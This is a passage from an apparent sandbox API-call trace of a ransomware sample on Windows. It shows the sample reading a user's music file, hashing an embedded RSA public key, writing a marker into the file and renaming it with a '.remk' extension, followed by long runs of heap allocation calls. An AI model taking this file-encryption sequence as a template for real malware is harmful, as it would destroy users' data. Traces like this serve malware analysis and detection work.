lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.293] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa623, lpOverlapped=0x0) returned 1 [0234.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.293] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.294] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.294] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.294] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.294] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.294] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.295] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.295] GetLastError () returned 0x0 [0234.295] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.295] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.295] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.295] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.295] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.295] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.296] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa623, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.296] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.296] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.296] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.296] CloseHandle (hObject=0x640) returned 1 [0234.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba600 [0234.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0234.299] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\L70E2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vbty960\\l70e2.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\L70E2.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vbty960\\l70e2.m4a.remk")) returned 1 [0234.302] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f05320, ftCreationTime.dwHighDateTime=0x1d5dd83, ftLastAccessTime.dwLowDateTime=0xa5c3afd0, ftLastAccessTime.dwHighDateTime=0x1d5e441, ftLastWriteTime.dwLowDateTime=0xa5c3afd0, ftLastWriteTime.dwHighDateTime=0x1d5e441, nFileSizeHigh=0x0, nFileSizeLow=0xa623, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L70E2.m4a", cAlternateFileName="")) returned 0 [0234.302] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.302] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.303] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba600 [0234.303] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.303] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.304] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.308] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.310] RtlAllocateHeap 